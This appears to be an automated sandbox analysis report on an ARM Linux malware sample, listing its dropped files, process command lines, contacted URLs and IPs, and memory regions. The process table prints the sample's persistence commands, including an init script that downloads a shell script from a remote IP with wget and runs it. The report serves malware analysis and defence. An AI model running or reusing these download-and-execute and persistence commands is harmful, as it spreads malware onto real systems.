Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm7.nn.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
||
/etc/init.d/arm7.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.yfgv7A (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.6pdpbvSciu /tmp/tmp.MsKToqCd4o /tmp/tmp.pnJQh3yJzc
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.6pdpbvSciu /tmp/tmp.MsKToqCd4o /tmp/tmp.pnJQh3yJzc
|
||
/tmp/arm7.nn.elf
|
/tmp/arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n
/tmp/arm7.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/arm7.nn.elf
|
-
|
||
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/tmp/arm7.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 42 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://154.216.19.140/curl.sh
|
unknown
|
||
http://154.216.19.140/lol.sh
|
unknown
|
||
http://154.216.19.140/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.112.253.208
|
unknown
|
United States
|
||
27.239.143.156
|
unknown
|
Korea Republic of
|
||
162.64.49.51
|
unknown
|
United States
|
||
2.201.201.43
|
unknown
|
Germany
|
||
192.48.250.112
|
unknown
|
United States
|
||
9.78.191.157
|
unknown
|
United States
|
||
86.19.24.254
|
unknown
|
United Kingdom
|
||
16.186.201.11
|
unknown
|
United States
|
||
223.77.165.193
|
unknown
|
China
|
||
125.255.131.237
|
unknown
|
Japan
|
||
131.193.114.222
|
unknown
|
United States
|
||
62.97.97.13
|
unknown
|
Spain
|
||
147.35.128.110
|
unknown
|
United States
|
||
158.70.208.242
|
unknown
|
United States
|
||
171.192.61.161
|
unknown
|
United States
|
||
129.35.49.144
|
unknown
|
United States
|
||
8.200.176.23
|
unknown
|
United States
|
||
110.34.178.120
|
unknown
|
Thailand
|
||
49.254.102.119
|
unknown
|
Korea Republic of
|
||
96.158.231.158
|
unknown
|
United States
|
||
112.57.175.27
|
unknown
|
China
|
||
53.94.145.196
|
unknown
|
Germany
|
||
63.233.71.169
|
unknown
|
United States
|
||
154.12.219.231
|
unknown
|
United States
|
||
93.16.231.148
|
unknown
|
France
|
||
130.173.198.124
|
unknown
|
United States
|
||
49.80.187.40
|
unknown
|
China
|
||
19.126.168.106
|
unknown
|
United States
|
||
157.107.136.102
|
unknown
|
Japan
|
||
221.208.165.30
|
unknown
|
China
|
||
79.250.189.91
|
unknown
|
Germany
|
||
222.34.76.106
|
unknown
|
China
|
||
27.69.126.65
|
unknown
|
Viet Nam
|
||
107.31.26.108
|
unknown
|
United States
|
||
207.44.100.111
|
unknown
|
United States
|
||
222.217.63.230
|
unknown
|
China
|
||
114.142.142.177
|
unknown
|
India
|
||
105.34.36.56
|
unknown
|
Egypt
|
||
100.210.116.0
|
unknown
|
United States
|
||
139.87.184.76
|
unknown
|
United States
|
||
76.25.139.168
|
unknown
|
United States
|
||
119.200.29.157
|
unknown
|
Korea Republic of
|
||
210.152.122.182
|
unknown
|
Japan
|
||
73.71.90.170
|
unknown
|
United States
|
||
209.152.185.166
|
unknown
|
United States
|
||
128.37.55.76
|
unknown
|
United States
|
||
1.168.211.11
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
78.245.167.244
|
unknown
|
France
|
||
29.177.144.67
|
unknown
|
United States
|
||
30.141.6.11
|
unknown
|
United States
|
||
18.106.66.209
|
unknown
|
United States
|
||
107.41.123.225
|
unknown
|
United States
|
||
156.228.180.116
|
unknown
|
Seychelles
|
||
167.245.160.21
|
unknown
|
United States
|
||
110.174.253.105
|
unknown
|
Australia
|
||
116.24.182.153
|
unknown
|
China
|
||
7.210.242.100
|
unknown
|
United States
|
||
114.156.125.169
|
unknown
|
Japan
|
||
142.110.46.211
|
unknown
|
Canada
|
||
220.74.252.165
|
unknown
|
Korea Republic of
|
||
155.162.50.37
|
unknown
|
United States
|
||
112.239.23.62
|
unknown
|
China
|
||
142.77.145.201
|
unknown
|
United States
|
||
122.253.193.89
|
unknown
|
Japan
|
||
193.143.1.59
|
unknown
|
unknown
|
||
91.192.158.43
|
unknown
|
Ukraine
|
||
52.96.223.135
|
unknown
|
United States
|
||
103.208.221.9
|
unknown
|
Japan
|
||
14.147.243.174
|
unknown
|
China
|
||
30.216.123.42
|
unknown
|
United States
|
||
44.52.114.173
|
unknown
|
United States
|
||
195.218.100.81
|
unknown
|
United Kingdom
|
||
187.37.131.26
|
unknown
|
Brazil
|
||
148.95.248.181
|
unknown
|
United States
|
||
176.135.216.89
|
unknown
|
France
|
||
221.146.149.176
|
unknown
|
Korea Republic of
|
||
173.53.99.161
|
unknown
|
United States
|
||
193.231.175.92
|
unknown
|
Romania
|
||
216.162.251.196
|
unknown
|
United States
|
||
43.224.123.163
|
unknown
|
New Zealand
|
||
78.20.95.118
|
unknown
|
Belgium
|
||
158.36.49.115
|
unknown
|
Norway
|
||
178.118.215.168
|
unknown
|
Belgium
|
||
179.66.77.159
|
unknown
|
Brazil
|
||
100.205.139.157
|
unknown
|
United States
|
||
201.166.76.4
|
unknown
|
Mexico
|
||
84.157.224.238
|
unknown
|
Germany
|
||
133.10.141.218
|
unknown
|
Japan
|
||
119.239.18.87
|
unknown
|
Japan
|
||
104.106.15.161
|
unknown
|
United States
|
||
138.39.2.130
|
unknown
|
United States
|
||
117.3.74.163
|
unknown
|
Viet Nam
|
||
201.166.228.51
|
unknown
|
Mexico
|
||
68.163.123.109
|
unknown
|
United States
|
||
1.54.54.155
|
unknown
|
Viet Nam
|
||
97.100.136.113
|
unknown
|
United States
|
||
21.106.205.76
|
unknown
|
United States
|
||
124.55.114.217
|
unknown
|
Korea Republic of
|
||
202.157.172.103
|
unknown
|
Singapore
|
||
88.146.106.127
|
unknown
|
Czech Republic
|
There are 90 hidden IPs, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fda18036000
|
page execute read
|
|||
5617196eb000
|
page read and write
|
|||
56171cb3c000
|
page read and write
|
|||
7fdb1e83c000
|
page read and write
|
|||
7ffed4997000
|
page read and write
|
|||
7fdb1f53a000
|
page read and write
|
|||
7fdb1e034000
|
page read and write
|
|||
7ffed49c8000
|
page execute read
|
|||
7fdb1f02a000
|
page read and write
|
|||
7fdb17fff000
|
page read and write
|
|||
7fda18043000
|
page read and write
|
|||
56171949a000
|
page execute read
|
|||
56171b709000
|
page read and write
|
|||
7fdb1eebe000
|
page read and write
|
|||
56171b6f2000
|
page execute and read and write
|
|||
7fdb1e8ce000
|
page read and write
|
|||
7fdb1f3ed000
|
page read and write
|
|||
7fdb1ec30000
|
page read and write
|
|||
7fda1803e000
|
page read and write
|
|||
5617196f4000
|
page read and write
|
|||
7fdb1ee9b000
|
page read and write
|
|||
7fdb1f516000
|
page read and write
|
|||
7fdb1f20c000
|
page read and write
|
|||
7fdb1f57f000
|
page read and write
|
|||
7fdb18021000
|
page read and write
|
There are 15 hidden memdumps, click here to show them.